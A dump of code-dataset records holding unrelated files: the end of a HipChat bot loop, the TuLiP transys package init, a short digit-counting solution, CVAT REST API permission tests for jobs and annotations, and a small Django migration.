self.hipChatManager.send("[EodBot] Visit http://6dc1e2bd.fbdev.midasplayer.com/ to teach me how to troll")
def __adjustInterval(self, failed):
if(failed == "true"):
if(self.sleepTime < _MAX_SLEEP_TIME):
self.sleepTime += 1
else:
self.sleepTime = _MIN_SLEEP_TIME
def start(self):
while 1==1:
newestMessage = self.hipChatManager.fetch()
if((str(newestMessage["from"]) != "Sassy") and (str(newestMessage["from"]["id"]) != self.bot_id) and (newestMessage["id"] != self.lastIdChecked)):
self.lastIdChecked = newestMessage["id"]
print("Parsing message: ",newestMessage['message'])
messageToSend = self.eodBotParser.parse(newestMessage['message'])
if(messageToSend != None):
self.hipChatManager.send(messageToSend)
self.__adjustInterval("false")
else:
self.__adjustInterval("true")
print("Sleeping for ",self.sleepTime," seconds")
time.sleep(self.sleepTime)
self.spamLastEodBotUrlTime += 1
if(self.spamLastEodBotUrlTime >= _SPAM_EODBOT_URL):
self.hipChatManager.send("[EodBot] Visit http://6dc1e2bd.fbdev.midasplayer.com/ to teach me how to troll")
self.spamLastEodBotUrlTime = 0
| true | true |
f71010536d580e3dc257b139c71119eec3b95907 | 2,202 | py | Python | tulip/transys/__init__.py | miquelramirez/tulip-control | ce54897c242689f45ad33650f157bf1805b35ed6 | [
"BSD-3-Clause"
] | 1 | 2020-02-13T14:13:50.000Z | 2020-02-13T14:13:50.000Z | tulip/transys/__init__.py | miquelramirez/tulip-control | ce54897c242689f45ad33650f157bf1805b35ed6 | [
"BSD-3-Clause"
] | null | null | null | tulip/transys/__init__.py | miquelramirez/tulip-control | ce54897c242689f45ad33650f157bf1805b35ed6 | [
"BSD-3-Clause"
] | 1 | 2019-07-09T16:32:39.000Z | 2019-07-09T16:32:39.000Z | # Copyright (c) 2013-2014 by California Institute of Technology
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the California Institute of Technology nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CALTECH
# OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
# USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
"""TuLiP Toolbox Transition System subpackage
Suggested abbreviation:
>>> from tulip import transys as trs
"""
from __future__ import absolute_import
from .mathset import MathSet, SubSet, PowerSet, TypedDict
from .labeled_graphs import prepend_with
from .transys import (
KripkeStructure, FiniteTransitionSystem, FTS,
LabeledGameGraph,
tuple2fts, line_labeled_with, cycle_labeled_with
)
from .automata import (
BuchiAutomaton, BA, tuple2ba,
RabinAutomaton, DRA,
ParityGame
)
from .machines import MooreMachine, MealyMachine
from .products import OnTheFlyProductAutomaton
| 38.631579 | 73 | 0.781108 |
from __future__ import absolute_import
from .mathset import MathSet, SubSet, PowerSet, TypedDict
from .labeled_graphs import prepend_with
from .transys import (
KripkeStructure, FiniteTransitionSystem, FTS,
LabeledGameGraph,
tuple2fts, line_labeled_with, cycle_labeled_with
)
from .automata import (
BuchiAutomaton, BA, tuple2ba,
RabinAutomaton, DRA,
ParityGame
)
from .machines import MooreMachine, MealyMachine
from .products import OnTheFlyProductAutomaton
| true | true |
f71011ebc8324e6ec4b4d16a31c684a403ca6635 | 325 | py | Python | FindNumberswithEvenNumberofDigits.py | eagletusk/pythonPractice | 4ac8d8c2f45072407b8f25514a3e54bddcd38a33 | [
"MIT"
] | null | null | null | FindNumberswithEvenNumberofDigits.py | eagletusk/pythonPractice | 4ac8d8c2f45072407b8f25514a3e54bddcd38a33 | [
"MIT"
] | null | null | null | FindNumberswithEvenNumberofDigits.py | eagletusk/pythonPractice | 4ac8d8c2f45072407b8f25514a3e54bddcd38a33 | [
"MIT"
] | null | null | null | class Solution:
def findNumbers(self, nums: List[int]) -> int:
bkt =[]
for n in nums:
count = str(n).count('')-1
print (str(n), count)
if count%2 == 0 :
bkt.append(count)
count =0
count =0
return len(bkt)
| 27.083333 | 50 | 0.412308 | class Solution:
def findNumbers(self, nums: List[int]) -> int:
bkt =[]
for n in nums:
count = str(n).count('')-1
print (str(n), count)
if count%2 == 0 :
bkt.append(count)
count =0
count =0
return len(bkt)
| true | true |
f710122a35afda1f83e03c6f8b0342dcee505738 | 12,984 | py | Python | tests/rest_api/test_jobs.py | campin11/cvat | 085ccce1cfb018d4eea2309d3086f4c8909c2cd3 | [
"Intel",
"MIT"
] | null | null | null | tests/rest_api/test_jobs.py | campin11/cvat | 085ccce1cfb018d4eea2309d3086f4c8909c2cd3 | [
"Intel",
"MIT"
] | null | null | null | tests/rest_api/test_jobs.py | campin11/cvat | 085ccce1cfb018d4eea2309d3086f4c8909c2cd3 | [
"Intel",
"MIT"
] | null | null | null | # Copyright (C) 2021 Intel Corporation
#
# SPDX-License-Identifier: MIT
from http import HTTPStatus
from deepdiff import DeepDiff
import pytest
from .utils.config import get_method, patch_method
def get_job_staff(job, tasks, projects):
    """Collect the ids of every user with a staff role on *job*: the job
    assignee, the task owner/assignee and -- when the task belongs to a
    project -- the project owner/assignee.  Missing (None) users are
    skipped."""
    task = tasks[job['task_id']]
    candidates = [job['assignee'], task['owner'], task['assignee']]
    project_id = job['project_id']
    if project_id:
        project = projects[project_id]
        candidates += [project['owner'], project['assignee']]
    return {user['id'] for user in candidates if user is not None}
def filter_jobs(jobs, tasks, org):
    """Restrict *jobs* to one organization and build matching request kwargs.

    org=None  -> every job (the fixture's raw list), no extra kwargs;
    org=''    -> sandbox jobs only (task has no organization);
    otherwise -> jobs whose task belongs to organization *org*.
    Returns (jobs, kwargs).
    """
    if org is None:
        return jobs.raw, {}
    if org == '':
        sandbox = [j for j in jobs if tasks[j['task_id']]['organization'] is None]
        return sandbox, {'org': ''}
    members = [j for j in jobs if tasks[j['task_id']]['organization'] == org]
    return members, {'org_id': org}
class TestGetJobs:
    """GET /jobs/{id}: admins see everything; other users see a job only
    when they are on its staff or on the organization staff."""
    def _test_get_job_200(self, user, jid, data, **kwargs):
        # Expect success and a payload identical to the fixture job.
        response = get_method(user, f'jobs/{jid}', **kwargs)
        assert response.status_code == HTTPStatus.OK
        assert DeepDiff(data, response.json()) == {}
    def _test_get_job_403(self, user, jid, **kwargs):
        response = get_method(user, f'jobs/{jid}', **kwargs)
        assert response.status_code == HTTPStatus.FORBIDDEN
    @pytest.mark.parametrize('org', [None, '', 1, 2])
    def test_admin_get_job(self, jobs, tasks, org):
        jobs, kwargs = filter_jobs(jobs, tasks, org)
        # keep only the reasonable amount of jobs
        for job in jobs[:8]:
            self._test_get_job_200('admin2', job['id'], job, **kwargs)
    @pytest.mark.parametrize('org_id', ['', None, 1, 2])
    @pytest.mark.parametrize('groups', [['business'], ['user'], ['worker'], []])
    def test_non_admin_get_job(self, org_id, groups, users, jobs, tasks, projects,
            org_staff):
        # keep the reasonable amount of users and jobs
        users = [u for u in users if u['groups'] == groups][:4]
        jobs, kwargs = filter_jobs(jobs, tasks, org_id)
        org_staff = org_staff(org_id)
        for job in jobs[:8]:
            job_staff = get_job_staff(job, tasks, projects)
            # only users on the job staff or the org staff may see the job
            for user in users:
                if user['id'] in job_staff | org_staff:
                    self._test_get_job_200(user['username'], job['id'], job, **kwargs)
                else:
                    self._test_get_job_403(user['username'], job['id'], **kwargs)
class TestListJobs:
    """GET /jobs: admins list all jobs of the scope; other users get the
    full (filtered) list only when they are members of the organization,
    otherwise 403."""
    def _test_list_jobs_200(self, user, data, **kwargs):
        # NOTE(review): page_size=all passes the *builtin* all here --
        # presumably get_method serializes it as the string "all"; confirm.
        response = get_method(user, 'jobs', **kwargs, page_size=all)
        assert response.status_code == HTTPStatus.OK
        assert DeepDiff(data, response.json()['results']) == {}
    def _test_list_jobs_403(self, user, **kwargs):
        response = get_method(user, 'jobs', **kwargs)
        assert response.status_code == HTTPStatus.FORBIDDEN
    @pytest.mark.parametrize('org', [None, '', 1, 2])
    def test_admin_list_jobs(self, jobs, tasks, org):
        jobs, kwargs = filter_jobs(jobs, tasks, org)
        self._test_list_jobs_200('admin1', jobs, **kwargs)
    @pytest.mark.parametrize('org_id', ['', None, 1, 2])
    @pytest.mark.parametrize('groups', [['business'], ['user'], ['worker'], []])
    def test_non_admin_list_jobs(self, org_id, groups, users, jobs, tasks,
            projects, org_staff, is_org_member):
        users = [u for u in users if u['groups'] == groups][:2]
        jobs, kwargs = filter_jobs(jobs, tasks, org_id)
        org_staff = org_staff(org_id)
        for user in users:
            # Build the subset of jobs this user is allowed to see.
            user_jobs = []
            for job in jobs:
                job_staff = get_job_staff(job, tasks, projects)
                if user['id'] in job_staff | org_staff:
                    user_jobs.append(job)
            if is_org_member(user['id'], org_id):
                self._test_list_jobs_200(user['username'], user_jobs, **kwargs)
            else:
                self._test_list_jobs_403(user['username'], **kwargs)
class TestGetAnnotations:
    """GET /jobs/{id}/annotations: job staff always may read; org
    maintainers/owners may read any job in their org; everyone else is
    rejected."""
    def _test_get_job_annotations_200(self, user, jid, data, **kwargs):
        response = get_method(user, f'jobs/{jid}/annotations', **kwargs)
        assert response.status_code == HTTPStatus.OK
        # version is server-managed and may differ from the fixture
        assert DeepDiff(data, response.json(),
            exclude_paths="root['version']") == {}
    def _test_get_job_annotations_403(self, user, jid, **kwargs):
        response = get_method(user, f'jobs/{jid}/annotations', **kwargs)
        assert response.status_code == HTTPStatus.FORBIDDEN
    # sandbox (no organization) scope
    @pytest.mark.parametrize('org', [''])
    @pytest.mark.parametrize('groups, job_staff, is_allow', [
        (['admin'], True, True), (['admin'], False, True),
        (['business'], True, True), (['business'], False, False),
        (['worker'], True, True), (['worker'], False, False),
        (['user'], True, True), (['user'], False, False)
    ])
    def test_user_get_job_annotations(self, org, groups, job_staff,
            is_allow, users, jobs, tasks, annotations, find_job_staff_user):
        users = [u for u in users if u['groups'] == groups]
        jobs, kwargs = filter_jobs(jobs, tasks, org)
        username, job_id = find_job_staff_user(jobs, users, job_staff)
        if is_allow:
            self._test_get_job_annotations_200(username,
                job_id, annotations['job'][str(job_id)], **kwargs)
        else:
            self._test_get_job_annotations_403(username, job_id, **kwargs)
    # organization members, per role
    @pytest.mark.parametrize('org', [2])
    @pytest.mark.parametrize('role, job_staff, is_allow', [
        ('owner', True, True), ('owner', False, True),
        ('maintainer', True, True), ('maintainer', False, True),
        ('supervisor', True, True), ('supervisor', False, False),
        ('worker', True, True), ('worker', False, False),
    ])
    def test_member_get_job_annotations(self, org, role, job_staff, is_allow,
            jobs, tasks, find_job_staff_user, annotations, find_users):
        users = find_users(org=org, role=role)
        jobs, kwargs = filter_jobs(jobs, tasks, org)
        username, jid = find_job_staff_user(jobs, users, job_staff)
        if is_allow:
            self._test_get_job_annotations_200(username,
                jid, annotations['job'][str(jid)], **kwargs)
        else:
            self._test_get_job_annotations_403(username, jid, **kwargs)
    # users outside the organization: only global admins get access
    @pytest.mark.parametrize('org', [1])
    @pytest.mark.parametrize('privilege, is_allow', [
        ('admin', True), ('business', False), ('worker', False), ('user', False)
    ])
    def test_non_member_get_job_annotations(self, org, privilege, is_allow,
            jobs, tasks, find_job_staff_user, annotations, find_users):
        users = find_users(privilege=privilege, exclude_org=org)
        jobs, kwargs = filter_jobs(jobs, tasks, org)
        username, job_id = find_job_staff_user(jobs, users, False)
        kwargs = {'org_id': org}
        if is_allow:
            self._test_get_job_annotations_200(username,
                job_id, annotations['job'][str(job_id)], **kwargs)
        else:
            self._test_get_job_annotations_403(username, job_id, **kwargs)
class TestPatchJobAnnotations:
    """Permission checks for PATCH .../jobs/{id}/annotations."""
    _ORG = 2

    def _test_check_respone(self, is_allow, response, data=None):
        # NOTE(review): method name looks like a typo of "response";
        # kept unchanged so existing callers are not broken.
        if not is_allow:
            assert response.status_code == HTTPStatus.FORBIDDEN
            return
        assert response.status_code == HTTPStatus.OK
        # 'version' is bumped server-side on every update, so ignore it.
        diff = DeepDiff(data, response.json(),
            exclude_paths="root['version']")
        assert diff == {}

    @pytest.fixture(scope='class')
    def request_data(self, annotations):
        """Build an update payload: move one shape and bump the version."""
        def get_data(jid):
            payload = annotations['job'][str(jid)].copy()
            payload['shapes'][0].update(
                {'points': [2.0, 3.0, 4.0, 5.0, 6.0, 7.0]})
            payload['version'] += 1
            return payload
        return get_data

    @pytest.mark.parametrize('org', [2])
    @pytest.mark.parametrize('role, job_staff, is_allow', [
        ('maintainer', False, True), ('owner', False, True),
        ('supervisor', False, False), ('worker', False, False),
        ('maintainer', True, True), ('owner', True, True),
        ('supervisor', True, True), ('worker', True, True)
    ])
    def test_member_update_job_annotations(self, org, role, job_staff, is_allow,
            find_job_staff_user, find_users, request_data, jobs_by_org, filter_jobs_with_shapes):
        candidates = filter_jobs_with_shapes(jobs_by_org[org])
        members = find_users(role=role, org=org)
        username, jid = find_job_staff_user(candidates, members, job_staff)
        payload = request_data(jid)
        response = patch_method(username, f'jobs/{jid}/annotations',
            payload, org_id=org, action='update')
        self._test_check_respone(is_allow, response, payload)

    @pytest.mark.parametrize('org', [2])
    @pytest.mark.parametrize('privilege, is_allow', [
        ('admin', True), ('business', False), ('worker', False), ('user', False)
    ])
    def test_non_member_update_job_annotations(self, org, privilege, is_allow,
            find_job_staff_user, find_users, request_data, jobs_by_org, filter_jobs_with_shapes):
        candidates = filter_jobs_with_shapes(jobs_by_org[org])
        outsiders = find_users(privilege=privilege, exclude_org=org)
        username, jid = find_job_staff_user(candidates, outsiders, False)
        payload = request_data(jid)
        response = patch_method(username, f'jobs/{jid}/annotations',
            payload, org_id=org, action='update')
        self._test_check_respone(is_allow, response, payload)

    @pytest.mark.parametrize('org', [''])
    @pytest.mark.parametrize('privilege, job_staff, is_allow', [
        ('admin', True, True), ('admin', False, True),
        ('business', True, True), ('business', False, False),
        ('worker', True, True), ('worker', False, False),
        ('user', True, True), ('user', False, False)
    ])
    def test_user_update_job_annotations(self, org, privilege, job_staff, is_allow,
            find_job_staff_user, find_users, request_data, jobs_by_org, filter_jobs_with_shapes):
        candidates = filter_jobs_with_shapes(jobs_by_org[org])
        accounts = find_users(privilege=privilege)
        username, jid = find_job_staff_user(candidates, accounts, job_staff)
        payload = request_data(jid)
        response = patch_method(username, f'jobs/{jid}/annotations',
            payload, org_id=org, action='update')
        self._test_check_respone(is_allow, response, payload)
class TestPatchJob:
    """Permission checks for PATCH .../jobs/{id} (assignee updates)."""
    _ORG = 2

    @pytest.fixture(scope='class')
    def find_task_staff_user(self, is_task_staff):
        """Return the first (user, job_id) with the requested staff status."""
        def find(jobs, users, is_staff):
            pairs = (
                (user, job['id'])
                for job in jobs
                for user in users
                if is_staff == is_task_staff(user['id'], job['task_id'])
            )
            return next(pairs, (None, None))
        return find

    @pytest.fixture(scope='class')
    def expected_data(self, jobs, users):
        """Job payload expected back after assigning *assignee_id*."""
        keys = ['url', 'id', 'username', 'first_name', 'last_name']
        def find(job_id, assignee_id):
            data = jobs[job_id].copy()
            data['assignee'] = {k: v for k, v in users[assignee_id].items()
                if k in keys}
            return data
        return find

    @pytest.fixture(scope='class')
    def new_assignee(self, jobs, tasks, assignee_id, org_staff):
        """Pick a member who is neither the current assignee nor *user_id*."""
        def find_new_assignee(jid, user_id):
            task_org = tasks[jobs[jid]['task_id']]['organization']
            members = org_staff(task_org)
            members -= {assignee_id(jobs[jid]), user_id}
            return members.pop()
        return find_new_assignee

    @pytest.mark.parametrize('org', [2])
    @pytest.mark.parametrize('role, task_staff, is_allow', [
        ('maintainer', False, True), ('owner', False, True),
        ('supervisor', False, False), ('worker', False, False),
        ('maintainer', True, True), ('owner', True, True),
        ('supervisor', True, True), ('worker', True, True)
    ])
    def test_member_update_job_assignee(self, org, role, task_staff, is_allow,
            find_task_staff_user, find_users, jobs_by_org, new_assignee, expected_data):
        members = find_users(role=role, org=org)
        user, jid = find_task_staff_user(jobs_by_org[org], members, task_staff)
        assignee = new_assignee(jid, user['id'])
        response = patch_method(user['username'], f'jobs/{jid}',
            {'assignee': assignee}, org_id=self._ORG)

        if not is_allow:
            assert response.status_code == HTTPStatus.FORBIDDEN
        else:
            assert response.status_code == HTTPStatus.OK
            assert DeepDiff(expected_data(jid, assignee), response.json()) == {}
| 41.883871 | 97 | 0.614911 |
from http import HTTPStatus
from deepdiff import DeepDiff
import pytest
from .utils.config import get_method, patch_method
def get_job_staff(job, tasks, projects):
    """Return the set of user ids considered staff for *job*.

    Staff = job assignee, the owning task's owner/assignee and, when the
    job belongs to a project, the project's owner/assignee (None entries
    are ignored).
    """
    task = tasks[job['task_id']]
    candidates = [job['assignee'], task['owner'], task['assignee']]
    pid = job['project_id']
    if pid:
        project = projects[pid]
        candidates += [project['owner'], project['assignee']]
    return {user['id'] for user in candidates if user is not None}
def filter_jobs(jobs, tasks, org):
    """Select jobs by organization scope and build the query kwargs.

    org=None  -> every job (raw fixture list), no extra query params;
    org=''    -> sandbox jobs (task has no organization);
    otherwise -> jobs whose task belongs to the given organization id.
    """
    def org_of(job):
        return tasks[job['task_id']]['organization']

    if org is None:
        return jobs.raw, {}
    if org == '':
        return [j for j in jobs if org_of(j) is None], {'org': ''}
    return [j for j in jobs if org_of(j) == org], {'org_id': org}
class TestGetJobs:
    """Permission checks for GET .../jobs/{id}."""

    def _test_get_job_200(self, user, jid, data, **kwargs):
        response = get_method(user, f'jobs/{jid}', **kwargs)
        assert response.status_code == HTTPStatus.OK
        assert DeepDiff(data, response.json()) == {}

    def _test_get_job_403(self, user, jid, **kwargs):
        response = get_method(user, f'jobs/{jid}', **kwargs)
        assert response.status_code == HTTPStatus.FORBIDDEN

    @pytest.mark.parametrize('org', [None, '', 1, 2])
    def test_admin_get_job(self, jobs, tasks, org):
        """An admin can fetch any job regardless of organization scope."""
        selected, extra = filter_jobs(jobs, tasks, org)
        # A small sample is enough; checking every job would be slow.
        for job in selected[:8]:
            self._test_get_job_200('admin2', job['id'], job, **extra)

    @pytest.mark.parametrize('org_id', ['', None, 1, 2])
    @pytest.mark.parametrize('groups', [['business'], ['user'], ['worker'], []])
    def test_non_admin_get_job(self, org_id, groups, users, jobs, tasks, projects,
            org_staff):
        """Non-admins may fetch a job only as job staff or org staff."""
        candidates = [u for u in users if u['groups'] == groups][:4]
        selected, extra = filter_jobs(jobs, tasks, org_id)
        staff_of_org = org_staff(org_id)

        for job in selected[:8]:
            allowed_ids = get_job_staff(job, tasks, projects) | staff_of_org
            for user in candidates:
                if user['id'] in allowed_ids:
                    self._test_get_job_200(user['username'], job['id'], job, **extra)
                else:
                    self._test_get_job_403(user['username'], job['id'], **extra)
class TestListJobs:
    """Permission checks for GET .../jobs (listing)."""

    def _test_list_jobs_200(self, user, data, **kwargs):
        # NOTE(review): `page_size=all` passes the *builtin* `all` here;
        # presumably the server treats it as "return everything", but
        # `page_size='all'` looks intended — confirm against the API.
        response = get_method(user, 'jobs', **kwargs, page_size=all)
        assert response.status_code == HTTPStatus.OK
        assert DeepDiff(data, response.json()['results']) == {}

    def _test_list_jobs_403(self, user, **kwargs):
        response = get_method(user, 'jobs', **kwargs)
        assert response.status_code == HTTPStatus.FORBIDDEN

    @pytest.mark.parametrize('org', [None, '', 1, 2])
    def test_admin_list_jobs(self, jobs, tasks, org):
        """An admin sees every job of the selected organization scope."""
        selected, extra = filter_jobs(jobs, tasks, org)
        self._test_list_jobs_200('admin1', selected, **extra)

    @pytest.mark.parametrize('org_id', ['', None, 1, 2])
    @pytest.mark.parametrize('groups', [['business'], ['user'], ['worker'], []])
    def test_non_admin_list_jobs(self, org_id, groups, users, jobs, tasks,
            projects, org_staff, is_org_member):
        """Members see only the jobs they staff; non-members get 403."""
        candidates = [u for u in users if u['groups'] == groups][:2]
        selected, extra = filter_jobs(jobs, tasks, org_id)
        staff_of_org = org_staff(org_id)

        for user in candidates:
            visible = [job for job in selected
                if user['id'] in get_job_staff(job, tasks, projects) | staff_of_org]
            if is_org_member(user['id'], org_id):
                self._test_list_jobs_200(user['username'], visible, **extra)
            else:
                self._test_list_jobs_403(user['username'], **extra)
class TestGetAnnotations:
    """Permission checks for GET .../jobs/{id}/annotations."""

    def _test_get_job_annotations_200(self, user, jid, data, **kwargs):
        response = get_method(user, f'jobs/{jid}/annotations', **kwargs)
        assert response.status_code == HTTPStatus.OK
        # 'version' is bumped server-side on every change, so it is
        # excluded from the comparison against the seeded annotations.
        assert DeepDiff(data, response.json(),
            exclude_paths="root['version']") == {}

    def _test_get_job_annotations_403(self, user, jid, **kwargs):
        response = get_method(user, f'jobs/{jid}/annotations', **kwargs)
        assert response.status_code == HTTPStatus.FORBIDDEN

    @pytest.mark.parametrize('org', [''])
    @pytest.mark.parametrize('groups, job_staff, is_allow', [
        (['admin'], True, True), (['admin'], False, True),
        (['business'], True, True), (['business'], False, False),
        (['worker'], True, True), (['worker'], False, False),
        (['user'], True, True), (['user'], False, False)
    ])
    def test_user_get_job_annotations(self, org, groups, job_staff,
            is_allow, users, jobs, tasks, annotations, find_job_staff_user):
        """Sandbox (no org): only admins and job staff may read annotations."""
        users = [u for u in users if u['groups'] == groups]
        jobs, kwargs = filter_jobs(jobs, tasks, org)
        username, job_id = find_job_staff_user(jobs, users, job_staff)

        if is_allow:
            self._test_get_job_annotations_200(username,
                job_id, annotations['job'][str(job_id)], **kwargs)
        else:
            self._test_get_job_annotations_403(username, job_id, **kwargs)

    @pytest.mark.parametrize('org', [2])
    @pytest.mark.parametrize('role, job_staff, is_allow', [
        ('owner', True, True), ('owner', False, True),
        ('maintainer', True, True), ('maintainer', False, True),
        ('supervisor', True, True), ('supervisor', False, False),
        ('worker', True, True), ('worker', False, False),
    ])
    def test_member_get_job_annotations(self, org, role, job_staff, is_allow,
            jobs, tasks, find_job_staff_user, annotations, find_users):
        """Org members: owners/maintainers always read; others need job staff."""
        users = find_users(org=org, role=role)
        jobs, kwargs = filter_jobs(jobs, tasks, org)
        username, jid = find_job_staff_user(jobs, users, job_staff)

        if is_allow:
            self._test_get_job_annotations_200(username,
                jid, annotations['job'][str(jid)], **kwargs)
        else:
            self._test_get_job_annotations_403(username, jid, **kwargs)

    @pytest.mark.parametrize('org', [1])
    @pytest.mark.parametrize('privilege, is_allow', [
        ('admin', True), ('business', False), ('worker', False), ('user', False)
    ])
    def test_non_member_get_job_annotations(self, org, privilege, is_allow,
            jobs, tasks, find_job_staff_user, annotations, find_users):
        """Outside the org, only an admin may read a job's annotations."""
        users = find_users(privilege=privilege, exclude_org=org)
        # filter_jobs() already returns kwargs == {'org_id': org} for an
        # integer org, so the former explicit re-assignment of kwargs
        # right after this call was redundant and has been removed.
        jobs, kwargs = filter_jobs(jobs, tasks, org)
        username, job_id = find_job_staff_user(jobs, users, False)

        if is_allow:
            self._test_get_job_annotations_200(username,
                job_id, annotations['job'][str(job_id)], **kwargs)
        else:
            self._test_get_job_annotations_403(username, job_id, **kwargs)
class TestPatchJobAnnotations:
    """Permission checks for PATCH .../jobs/{id}/annotations."""
    _ORG = 2

    def _test_check_respone(self, is_allow, response, data=None):
        # NOTE(review): method name looks like a typo of "response";
        # kept unchanged so existing callers are not broken.
        if not is_allow:
            assert response.status_code == HTTPStatus.FORBIDDEN
            return
        assert response.status_code == HTTPStatus.OK
        # 'version' is bumped server-side on every update, so ignore it.
        diff = DeepDiff(data, response.json(),
            exclude_paths="root['version']")
        assert diff == {}

    @pytest.fixture(scope='class')
    def request_data(self, annotations):
        """Build an update payload: move one shape and bump the version."""
        def get_data(jid):
            payload = annotations['job'][str(jid)].copy()
            payload['shapes'][0].update(
                {'points': [2.0, 3.0, 4.0, 5.0, 6.0, 7.0]})
            payload['version'] += 1
            return payload
        return get_data

    @pytest.mark.parametrize('org', [2])
    @pytest.mark.parametrize('role, job_staff, is_allow', [
        ('maintainer', False, True), ('owner', False, True),
        ('supervisor', False, False), ('worker', False, False),
        ('maintainer', True, True), ('owner', True, True),
        ('supervisor', True, True), ('worker', True, True)
    ])
    def test_member_update_job_annotations(self, org, role, job_staff, is_allow,
            find_job_staff_user, find_users, request_data, jobs_by_org, filter_jobs_with_shapes):
        candidates = filter_jobs_with_shapes(jobs_by_org[org])
        members = find_users(role=role, org=org)
        username, jid = find_job_staff_user(candidates, members, job_staff)
        payload = request_data(jid)
        response = patch_method(username, f'jobs/{jid}/annotations',
            payload, org_id=org, action='update')
        self._test_check_respone(is_allow, response, payload)

    @pytest.mark.parametrize('org', [2])
    @pytest.mark.parametrize('privilege, is_allow', [
        ('admin', True), ('business', False), ('worker', False), ('user', False)
    ])
    def test_non_member_update_job_annotations(self, org, privilege, is_allow,
            find_job_staff_user, find_users, request_data, jobs_by_org, filter_jobs_with_shapes):
        candidates = filter_jobs_with_shapes(jobs_by_org[org])
        outsiders = find_users(privilege=privilege, exclude_org=org)
        username, jid = find_job_staff_user(candidates, outsiders, False)
        payload = request_data(jid)
        response = patch_method(username, f'jobs/{jid}/annotations',
            payload, org_id=org, action='update')
        self._test_check_respone(is_allow, response, payload)

    @pytest.mark.parametrize('org', [''])
    @pytest.mark.parametrize('privilege, job_staff, is_allow', [
        ('admin', True, True), ('admin', False, True),
        ('business', True, True), ('business', False, False),
        ('worker', True, True), ('worker', False, False),
        ('user', True, True), ('user', False, False)
    ])
    def test_user_update_job_annotations(self, org, privilege, job_staff, is_allow,
            find_job_staff_user, find_users, request_data, jobs_by_org, filter_jobs_with_shapes):
        candidates = filter_jobs_with_shapes(jobs_by_org[org])
        accounts = find_users(privilege=privilege)
        username, jid = find_job_staff_user(candidates, accounts, job_staff)
        payload = request_data(jid)
        response = patch_method(username, f'jobs/{jid}/annotations',
            payload, org_id=org, action='update')
        self._test_check_respone(is_allow, response, payload)
class TestPatchJob:
    """Permission checks for PATCH .../jobs/{id} (assignee updates)."""
    _ORG = 2

    @pytest.fixture(scope='class')
    def find_task_staff_user(self, is_task_staff):
        """Return the first (user, job_id) with the requested staff status."""
        def find(jobs, users, is_staff):
            pairs = (
                (user, job['id'])
                for job in jobs
                for user in users
                if is_staff == is_task_staff(user['id'], job['task_id'])
            )
            return next(pairs, (None, None))
        return find

    @pytest.fixture(scope='class')
    def expected_data(self, jobs, users):
        """Job payload expected back after assigning *assignee_id*."""
        keys = ['url', 'id', 'username', 'first_name', 'last_name']
        def find(job_id, assignee_id):
            data = jobs[job_id].copy()
            data['assignee'] = {k: v for k, v in users[assignee_id].items()
                if k in keys}
            return data
        return find

    @pytest.fixture(scope='class')
    def new_assignee(self, jobs, tasks, assignee_id, org_staff):
        """Pick a member who is neither the current assignee nor *user_id*."""
        def find_new_assignee(jid, user_id):
            task_org = tasks[jobs[jid]['task_id']]['organization']
            members = org_staff(task_org)
            members -= {assignee_id(jobs[jid]), user_id}
            return members.pop()
        return find_new_assignee

    @pytest.mark.parametrize('org', [2])
    @pytest.mark.parametrize('role, task_staff, is_allow', [
        ('maintainer', False, True), ('owner', False, True),
        ('supervisor', False, False), ('worker', False, False),
        ('maintainer', True, True), ('owner', True, True),
        ('supervisor', True, True), ('worker', True, True)
    ])
    def test_member_update_job_assignee(self, org, role, task_staff, is_allow,
            find_task_staff_user, find_users, jobs_by_org, new_assignee, expected_data):
        members = find_users(role=role, org=org)
        user, jid = find_task_staff_user(jobs_by_org[org], members, task_staff)
        assignee = new_assignee(jid, user['id'])
        response = patch_method(user['username'], f'jobs/{jid}',
            {'assignee': assignee}, org_id=self._ORG)

        if not is_allow:
            assert response.status_code == HTTPStatus.FORBIDDEN
        else:
            assert response.status_code == HTTPStatus.OK
            assert DeepDiff(expected_data(jid, assignee), response.json()) == {}
| true | true |
f71012b82436e5dd37274c5125768f25f6343cca | 371 | py | Python | polls/migrations/0002_auto_20200211_1555.py | rpesce/django_tutorial | b0a3c10c1246ec42e9c86c03a7b441ff8be1c495 | [
"Apache-2.0"
] | 11 | 2020-03-25T16:03:08.000Z | 2022-03-19T17:59:43.000Z | polls/migrations/0002_auto_20200211_1555.py | rpesce/django_tutorial | b0a3c10c1246ec42e9c86c03a7b441ff8be1c495 | [
"Apache-2.0"
] | null | null | null | polls/migrations/0002_auto_20200211_1555.py | rpesce/django_tutorial | b0a3c10c1246ec42e9c86c03a7b441ff8be1c495 | [
"Apache-2.0"
] | 3 | 2020-08-18T03:34:59.000Z | 2022-03-21T13:44:45.000Z | # Generated by Django 3.0.3 on 2020-02-11 20:55
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration for the tutorial's polls app:
    # re-declares Choice.votes so that new rows default to 0.
    # Kept in its generated form, as is conventional for migrations.
    dependencies = [
        ('polls', '0001_initial'),
    ]
    operations = [
        # AlterField keeps the integer column type and adds default=0.
        migrations.AlterField(
            model_name='choice',
            name='votes',
            field=models.IntegerField(default=0),
        ),
    ]
| 19.526316 | 49 | 0.58221 |
from django.db import migrations, models
